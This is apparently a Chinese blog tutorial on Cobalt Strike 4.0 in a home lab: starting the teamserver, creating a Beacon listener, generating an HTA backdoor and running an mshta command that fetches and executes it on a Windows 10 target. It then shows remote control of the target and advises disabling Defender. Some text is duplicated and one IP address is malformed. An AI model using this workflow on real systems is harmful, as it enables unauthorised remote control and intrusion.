CobaltStrike4.0教程-HTML Application

CobaltStrike4.0教程-HTML Application

一、什么是CobaltStrike?

Cobalt Strike是一款专业的渗透测试工具,常用于网络攻击和红队行动。它最初作为Metasploit框架的商业扩展版本,由Raphael Mudge开发并由SpecterOps团队维护。
Cobalt Strike提供了多种功能和特性,以帮助安全专业人员模拟真实世界中的攻击,并评估目标网络的安全性。其主要功能包括:

  1. 命令与控制(C2):Cobalt Strike提供了一个灵活强大的命令与控制平台,允许渗透测试人员通过远程访问受感染系统、执行命令、获取目标信息等进行操控。
  2. 社交工程:该工具集成了多种社交工程模块,如钓鱼攻击、恶意文件生成等,以便诱骗用户点击链接或打开恶意附件。这有助于测试组织在面对此类攻击时的防御能力。
  3. 漏洞利用:Cobalt Strike支持多种漏洞利用技术,并集成了Metasploit框架的强大漏洞利用模块。这使得渗透测试人员可以有效地定位和利用系统中存在的漏洞。
  4. 持久性和横向移动:Cobalt Strike提供了多种技术,如后门、持久化脚本和横向移动工具,以帮助渗透测试人员在受感染系统中保持访问权限,并探索目标网络中的其他系统。

二、功能简介

在这里插入图片描述

文件功能
agscript扩展应用的脚本
c2lint用于检查profile的错误和异常
teamserver服务器端启动程序
cobaltstrike.jarCobaltStrike核心程序
cobaltstrike.auth用于客户端和服务器端认证的文件,客户端和服务端有一个一模一样的
cobaltstrike.storeSSL秘钥库,可以使用keytool(Java数据证书管理工具)进行修改
start.sh运行客户端的shell脚本,与cobaltstrike作用相同
目录功能
data用于保存当前TeamServer的一些数据
logs日志文件,包括Web日志、Beacon日志、截图日志、下载日志、键盘记录日志等
third-party第三方工具目录
uploads上传文件的目录

三、实验环境

kali cs服务端 192.168.57.142(服务端通常运行在Linux环境)

kali cs客户端 192.168.57.142( 可以跨平台,运行在Linux/Windows环境,启动后在对话框输入服务端的ip和连接密码,名字自定义 )

windows10 靶机 192.168.57.148

在这里插入图片描述

在这里插入图片描述

四、实验过程

在桌面打开终端,进入root模式,打开CobaltStrike文件夹

在这里插入图片描述

4.1 启动cs的服务端

./teamserver 192.168.xxx.xxx passwd   #这里passwd随便填得记住 待会连接客户端得用 

在这里插入图片描述

4.2 另外开启一终端,打开cs的客户端

./start.sh

会跳出cs的连接界面:

  • HOST 为我们刚刚建立服务器的IP地址
  • PORT 为端口号 (端口不用管 默认就可以)
  • USER 为用户名 (默认另取都可以)
  • Password 为登录密码 (刚才设置的服务端passwd)

在这里插入图片描述

连接成功后会看到一段话:user has joined.

在这里插入图片描述

CobaltStrike模块功能
New Connection打开一个新连接窗口
Preferences偏好设置,就是设置CobaltStrike外观的
Visualization将主机以不同的权限展示出来(主要以输出结果的形式展示)
VPN Interfaces设置VPN接口
Listeners创建监听器
Script Interfaces查看和加载CNA脚本

4.3 创建监听器Listener

Beacon为内置监听器(支持异步通信和交互式通信),Foreign为外置监听器。

点击左上方CobaltStrike选项—>下拉框选中 Listeners —>在下方弹出区域中单机add

在这里插入图片描述

4.4 创建攻击Attacks(生成后门)

在这里插入图片描述

在这里插入图片描述

会自动生成一个hta文件

在这里插入图片描述

在这里插入图片描述

4.5 提供端口下载文件

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

4.6 在靶机执行远程命令

mshta http://1932.168.57.142:10066/download/file.ext

在这里插入图片描述

可以看到此时靶机上线

在这里插入图片描述

特别注意:要把win10的防火墙和defender都关掉,不然很容易被杀掉

在这里插入图片描述

在这里插入图片描述

4.7 攻击目标主机

当有目标主机以任何方式运行了生成的被控端,出现在主机列表,选中要操作的目标主机,右键interact进入交与命令界面,在此使用Beacon Commands对目标主机执行各种操作。

在这里插入图片描述

设置sleep 0
执行shell命令 shell ipconfig

在这里插入图片描述

成功上线,这里有一个我比较疑惑的点是:在攻击之前win10的IP地址是192.168.57.148,执行了远程命令后IP地址变成了192.168.57.151,但不影响攻击结果。

4.8 操控目标机器

eg:任务管理器(文件管理、远程桌面、屏幕截图等)

在这里插入图片描述

地址是192.168.57.148,执行了远程命令后IP地址变成了192.168.57.151,但不影响攻击结果。

4.9 操控目标机器

eg:任务管理器(文件管理、远程桌面、屏幕截图等)

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值